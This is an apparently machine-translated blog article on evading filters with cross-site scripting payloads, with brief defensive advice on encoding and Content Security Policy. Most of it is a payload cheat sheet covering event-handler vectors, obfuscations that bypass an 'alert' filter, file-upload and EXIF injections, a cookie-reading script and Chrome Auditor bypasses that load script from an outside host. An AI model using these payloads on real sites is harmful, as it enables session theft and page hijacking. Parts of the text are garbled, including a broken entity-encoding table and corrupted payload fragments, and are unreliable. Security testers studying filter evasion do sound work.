Methods for circumventing web application security tools when operating XSS vectors
Despite the large number of recommendations for protecting web applications from client-side attacks, such as XSS (cross site scripting), many developers ignore them or do not fully comply with these requirements. The article will consider ways to bypass the filtering tools and in the operation of xss-vectors.
Now there are quite a few ways to prevent XSS vulnerabilities, including the defenses of modern browsers trying to prevent the execution of malicious code affecting the user. Nevertheless, XSS vulnerabilities over the past years have been confidently included in the top three OWASP. XSS vulnerabilities are found both on obscure projects and large ones - for example, you can see a selection of the latest publicly disclosed hackerone project vulnerabilities - the lion's share of them is taken up by xss vulnerabilities. This also applies to fairly common CMS - the latest (at the time of publication of the article) version of Wordpress 4.7.3. closes several XSS vulnerabilities.
Protection
Basic preventive measures:
- data validation
- output conversion
In practice, this should be implemented as:
- exclusion of all untrusted data from the context (body, attributes, JavaScript, CSS, or URL);
- use of "white lists" on the server side (checking the length, format, logic, etc.);
- use of specialized data cleaning tools (OWASP AntiSamy or Java HTML Sanitizer Project);
- use of the HttpOnly attribute;
- use of content security policy.
Do not let us use untrusted data:
<script>...XSS...</script> script <!--....XSS...--> HTML <div ...XSS...=test /> <...XSS...... href="/test" /> <style>...XSS...</style> CSS Let's not use untrusted data in the HTML element content:
<body> ... ... </ body> <div> ... ... </ div> Use entity transformation:
& --> & < --> < > --> > " --> " ' --> ' ( ' ) / --> / There are many methods of protection, but one of the most effective is the use of Content Security Policy.
Content Security Policy
Previously, one of the main principles of browser security was the Same Origin Policy. Its essence lies in the verification of the three components that make up origin: protocol, host, and port. However, if you implement a payload from one site to another, the SOP will be useless for a site with an embedded payload. Therefore, CSP came to replace SOP, the main purpose of which is to protect the user from threats of cross-site scripting. CSP describes secure sources for loading resources, sets rules for using embedded styles, scripts, and dynamic JavaScript evaluation. The most important thing is that downloads from resources that are not included in the white list are blocked.
Supported directives:
- Default-src: definition of the load policy for all types of resources in case a specific resource type directive is not defined (standby);
- Script-src: which scripts can use the protected resource;
- Object-src: whence the resource can load plugins;
- Style-src: what styles (CSS) the user applies to the protected resource;
- Img -src: from where the protected resource can download images;
- Media-src: whence a protected resource can download video and audio;
- Frame-src: where the protected resource can insert frames;
- Font-src: where the protected resource can download fonts;
- Connect-src: which URIs can be loaded by the protected resource;
- Form-action: which URIs can be used as a result of the HTML form;
- Sandbox: defines the HTML sandbox policy;
- Script-nonce: script execution, requiring the presence of a specified nonce for script elements;
- Plugin-types: a set of plug-ins that can be caused by a protected resource, by limiting the types of resources that can be embedded;
- Reflection-xss: activate or deactivate any checks used to filter or block reflected attacks between sites, equivalent to a non-standard X-XSS-Protection header;
- Report-uri: Indicates the URI to which the user agent sends violation reports.
Identify XSS vulnerabilities
XSS-locators or probes can be used to check for vulnerabilities:
The simplest probe:
'';!--"<XSS>=&{()} Simplest JavaScript XSS:
<SCRIPT SRC=http://xss/xss.js></SCRIPT> An example of several payloads to bypass possible filtering:
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)> <script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script> <script>alert(document.cookie)</script>"> <img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>'"> JavaScript directive:
<IMG SRC="javascript:alert('XSS');"> Register Vector:
<IMG SRC=JaVaScRiPt:alert('XSS')> Event handlers can be used to implement XSS payloads:
FSCommand onAbort onActivate onAfterPrint onAfterUpdate onBeforeActivate onBeforeCopy onBeforeCut onBeforeDeactivate onBeforeEditFocus onBeforePaste onBeforePrint onBeforeUnload onBeforeUpdate onBegin onBlur onBounce onCellChange onChange onClick onContextMenu onControlSelect onCopy onCut onDataAvailable onDataSetChanged onDataSetComplete onDblClick onDeactivate onDrag onDragEnd onDragLeave onDragEnter onDragOver onDragDrop onDragStart onDrop onEnd onError onErrorUpdate onFilterChange onFinish onFocus onFocusIn onFocusOut onHashChange onHelp onInput onKeyDown onKeyPress onKeyUp onLayoutComplete onLoad onLoseCapture onMediaComplete onMediaError onMessage onMouseDown onMouseEnter onMouseLeave onMouseMove onMouseOut onMouseOver onMouseUp onMouseWheel onMove onMoveEnd onMoveStart onOffline onOnline onOutOfSync onPaste onPause onPopState onProgress onPropertyChange onReadyStateChange onRedo onRepeat onReset onResize onResizeEnd onResizeStart onResume onReverse onRowsEnter onRowExit onRowDelete onRowInserted onScroll onSeek onSelect onSelectionChange onSelectStart onStart onStop onStorage onSyncRestored onSubmit onTimeError onTrackChange onUndo onUnload onURLFlip seekSegmentTime Examples of XSS payloads for filtering bypass
Adding a tag:
<svg onload=alert(1)> "><svg onload=alert(1)// Inline Payload:
"onmouseover=alert(1)// "autofocus/onfocus=alert(1)// Javascript payloads:
'-alert(1)-' '-alert(1)// \ '- alert (1) // Javascript payload (add tag):
</ Script> <svg onload = alert (1)> Implementing PHP_SELF:
http: //DOMAIN/PAGE.php/ "> <svg onload = alert (1)> Bypass filtering brackets:
<svg onload=alert`1`> <svg onload=alert(1)> <svg onload=alert(1)> <svg onload=alert(1)> Bypassing the "alert" filter:
(alert)(1) a=alert,a(1) [1].find(alert) top["al"+"ert"](1) top[/al/.source+/ert/.source](1) al\u0065rt(1) top['al\145rt'](1) top['al\x65rt'](1) top[8680439..toString(30)](1) Body tag:
<body onload=alert(1)> <body onpageshow=alert(1)> <body onfocus=alert(1)> <body onhashchange=alert(1)><a href=#x>click this!#x <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x <body onscroll=alert(1)><br><br><br><br> <br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><x id=x>#x <body onresize=alert(1)>press F12! <body onhelp=alert(1)>press F1! (MSIE) Rarely used tags:
<marquee onstart=alert(1)> <marquee loop=1 width=0 onfinish=alert(1)> <audio src onloadstart=alert(1)> <video onloadstart=alert(1)><source> <input autofocus onblur=alert(1)> <keygen autofocus onfocus=alert(1)> <form onsubmit=alert(1)><input type=submit> <select onchange=alert(1)><option>1<option>2 <menu id=x contextmenu=x onshow=alert(1)>right click me! Event Handlers:
<x contenteditable onblur=alert(1)>lose focus! <x onclick=alert(1)>click this! <x oncopy=alert(1)>copy this! <x oncontextmenu=alert(1)>right click this! <x oncut=alert(1)>copy this! <x ondblclick=alert(1)>double click this! <x ondrag=alert(1)>drag this! <x contenteditable onfocus=alert(1)>focus this! <x contenteditable oninput=alert(1)>input here! <x contenteditable onkeydown=alert(1)>press any key! <x contenteditable onkeypress=alert(1)>press any key! <x contenteditable onkeyup=alert(1)>press any key! <x onmousedown=alert(1)>click this! <x onmousemove=alert(1)>hover this! <x onmouseout=alert(1)>hover this! <x onmouseover=alert(1)>hover this! <x onmouseup=alert(1)>click this! <x contenteditable onpaste=alert(1)>paste here! Direct execution:
<script>alert(1)</script> <script src=javascript:alert(1)> <iframe src=javascript:alert(1)> <embed src=javascript:alert(1)> <a href=javascript:alert(1)>click $<!-- math><brute href=javascript:alert(1)>click <form action=javascript:alert(1)><input type=submit> <isindex action=javascript:alert(1) type=submit value=click> <form><button formaction=javascript:alert(1)>click <form><input formaction=javascript:alert(1) type=submit value=click> <form><input formaction=javascript:alert(1) type=image value=click> <form><input formaction=javascript:alert(1) type=image src=SOURCE> <isindex formaction=javascript:alert(1) type=submit value=click> <object data=javascript:alert(1)> <iframe srcdoc=<svg/onload=alert(1)>> <svg><script xlink:href=data:,alert(1) /> $<!-- math><brute xlink:href=javascript:alert(1)>click <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> Mobile event handlers:
<html ontouchstart=alert(1)> <html ontouchend=alert(1)> <html ontouchmove=alert(1)> <html ontouchcancel=alert(1)> <body onorientationchange=alert(1)> Upload files:
"><img src=1 onerror=alert(1)>.gif $ exiftool -Artist='"><img src=1 onerror=alert(1)>' FILENAME.jpeg SVG <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> GIF GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; Bypass Google Chrome XSS Auditor (up to version 51):
<script src="data:,alert(1)// "><script src=data:,alert(1)// <script src="//brutelogic.com.br/1.js# "><script src=//brutelogic.com.br/1.js# <link rel=import href="data:text/html,<script>alert(1)</script> "><link rel=import href=data:text/html,<script>alert(1)</script> Conclusion
Adhere to the rule: all input is evil until proven otherwise.
Check incoming data.
Check the output.
Use comprehensive tools to protect web applications from hacker attacks.
')
Source: https://habr.com/ru/post/326722/
All Articles